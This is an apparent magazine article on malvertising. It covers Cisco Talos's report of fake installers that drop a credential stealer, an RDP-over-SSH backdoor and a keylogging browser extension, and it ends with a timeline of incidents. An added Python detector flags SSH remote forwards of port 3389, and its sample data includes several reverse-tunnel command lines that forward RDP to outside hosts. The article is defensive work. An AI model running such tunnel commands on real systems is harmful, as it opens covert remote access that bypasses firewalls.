Cisco Talos Intelligence Group recently observed a malware distribution campaign that tries to trick users into executing fake installers of popular software on their systems. Talos said it believes, with moderate confidence, that online advertising is used to reach potential victims who are searching for software to install on their systems.
Cyber Magazine takes a look at malvertising.
What is malvertising?
Malvertising, or malicious advertising, is the use of online, malicious advertisements to spread malware and compromise systems. Generally this occurs through the injection of unwanted or malicious code into ads. Malicious actors then pay legitimate online advertising networks to display the infected ads on various websites, exposing every user visiting these sites to the potential risk of infection. Generally, the legitimate advertising networks and websites are not aware they are serving malicious content.
Why does malvertising work?
In the campaign Talos observed, once the fake installers run they execute three pieces of malware on the victim's system:
- A password stealer that collects all the credentials available on the system.
- A "backdoor" that sets up remote access via a stealth Microsoft Remote Desktop session by forwarding the RDP port through an SSH tunnel, allowing access to systems even when behind a firewall.
- A malicious browser extension that contains several information-stealing features, such as keylogging and taking screenshots.
Cisco Talos' Technical Lead of Security Research, Tiago Pereira, says: "Password stealers have long presented a risk to individuals and to companies. The compromised accounts are frequently sold in underground forums and may lead to additional compromise using the stolen accounts and through password reuse. The Chrome extension adds to this risk by allowing the theft of credentials used on the web that may not be stored in the system. Additionally, the use of an SSH tunnel to forward RDP to an external server provides attackers with a reliable way to log in remotely to a system, bypassing firewall control."
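The backdoor described above forwards the victim's RDP port out through an SSH tunnel, which from the host's point of view is an SSH client started with a remote port forward (`-R`) whose destination is port 3389. Process-creation telemetry is one place defenders can look for that. The following is an added example written for this article, not code from Cisco Talos or Cyber Magazine: it scans a handful of constructed process-creation records (the `pid`/`image`/`cmdline` field names are an assumption, loosely modelled on Sysmon event ID 1) and flags `ssh` or `plink` command lines whose `-R` specification points at the RDP port, while ignoring local forwards (`-L`) and plain interactive sessions.

```python
"""Flag SSH remote port forwards that expose the local RDP port (3389).

Added example for this article, not code from Cisco Talos or Cyber Magazine.
The event records below are constructed; the field names pid/image/cmdline
are an assumption modelled loosely on Sysmon process-creation events.
"""
import shlex

RDP_PORT = 3389
SSH_CLIENTS = {"ssh", "ssh.exe", "plink", "plink.exe"}

# Constructed sample events: three RDP reverse tunnels (pids 4120, 4133, 5020),
# one benign local forward (5001) and one plain interactive session (5010).
# Hosts use RFC 5737 documentation addresses; none is a real indicator.
SAMPLE_EVENTS = [
    {"pid": 4120, "image": r"C:\Users\alice\AppData\Local\Temp\ssh.exe",
     "cmdline": "ssh.exe -o StrictHostKeyChecking=no -N -R 2222:127.0.0.1:3389 tunnel@198.51.100.23"},
    {"pid": 4133, "image": r"C:\Program Files\PuTTY\plink.exe",
     "cmdline": "plink.exe -batch -R 0.0.0.0:5555:localhost:3389 user@203.0.113.7"},
    {"pid": 5001, "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": "ssh.exe -L 8080:intranet:80 alice@jumphost"},
    {"pid": 5010, "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": "ssh.exe admin@build-server"},
    {"pid": 5020, "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": "ssh.exe -R3389:localhost:3389 -N svc@192.0.2.9"},
]


def tokenize(cmdline):
    """Split a command line into arguments, keeping Windows-style quoting intact."""
    try:
        return shlex.split(cmdline, posix=False)
    except ValueError:          # unbalanced quotes: fall back to whitespace split
        return cmdline.split()


def remote_forward_specs(cmdline):
    """Return the argument of every -R option (both '-R spec' and '-Rspec' forms)."""
    tokens = tokenize(cmdline)
    specs = []
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if tok == "-R" and i + 1 < len(tokens):
            specs.append(tokens[i + 1])
            i += 2
            continue
        if tok.startswith("-R") and len(tok) > 2:
            specs.append(tok[2:])
        i += 1
    return specs


def forward_target_port(spec):
    """Parse '[bind_address:]port:host:hostport' and return hostport as an int.

    Returns None for the Unix-socket form ('port:/path/to/socket') or anything
    that does not end in a numeric port. Only the final port is used, so a
    bracketed IPv6 host still yields the right port even if the host splits badly.
    """
    parts = spec.rsplit(":", 2)
    if len(parts) != 3 or not parts[2].isdigit():
        return None
    return int(parts[2])


def ssh_destination(cmdline):
    """Best-effort extraction of the user@host argument, or None."""
    return next((t for t in tokenize(cmdline) if "@" in t and not t.startswith("-")), None)


def is_ssh_client(image):
    """True when the executable's base name is a known OpenSSH or PuTTY client."""
    name = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return name in SSH_CLIENTS


def find_rdp_reverse_tunnels(events):
    """Return one finding per -R forward whose target port is the RDP port."""
    findings = []
    for ev in events:
        if not is_ssh_client(ev["image"]):
            continue
        for spec in remote_forward_specs(ev["cmdline"]):
            if forward_target_port(spec) == RDP_PORT:
                findings.append({"pid": ev["pid"], "spec": spec,
                                 "remote": ssh_destination(ev["cmdline"])})
    return findings


if __name__ == "__main__":
    for f in find_rdp_reverse_tunnels(SAMPLE_EVENTS):
        print(f"pid {f['pid']}: RDP forwarded via -R {f['spec']} to {f['remote']}")
```

The check keys on the destination port of the forward rather than on the listening port, because the attacker chooses the listening side freely while the RDP service port on the victim is fixed. In a real deployment the event list would come from the endpoint telemetry pipeline rather than the constructed sample, and a hit is a strong lead rather than proof on its own: an administrator may legitimately tunnel RDP, so the finding should be enriched with the parent process (a freshly downloaded "installer" spawning ssh is the pattern the article describes) and the destination host before it is escalated.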
According to Wikipedia, here is a timeline of malvertising activity:
2007/2008: The first recorded sighting of malvertising was in late 2007 to early 2008. This threat was based on a vulnerability in Adobe Flash and affected a number of platforms including MySpace, Excite and Rhapsody.
2009: The online edition of The New York Times Magazine was found to be serving an ad that was part of a larger click-fraud scam. The scam built a botnet of malware-infected computers, nicknamed the Bahama botnet, which was then used to carry out click fraud on pay-per-click ads all over the web.
2010: Malvertising takes off. Marketing analysts ClickZ noted that the Online Trust Alliance (OTA) identified billions of display ads, across 3,500 sites, carrying malware. In the same year the Online Trust Alliance formed a cross-industry Anti-Malvertising Task Force.
2011: Spotify had a malvertising attack.
2012: Symantec includes malvertising as a section in its Internet Security Threat Report 2013.
2013: A major malvertising campaign was waged against Yahoo.com, one of the largest ad platforms with monthly visits of 6.9 billion.
2015: McAfee's Threat Report for February 2015 said that malvertising was growing quickly on mobile platforms.
2021: Ransomware gang REvil was spotted using paid positioning in Google search results to deliver malicious files to victims.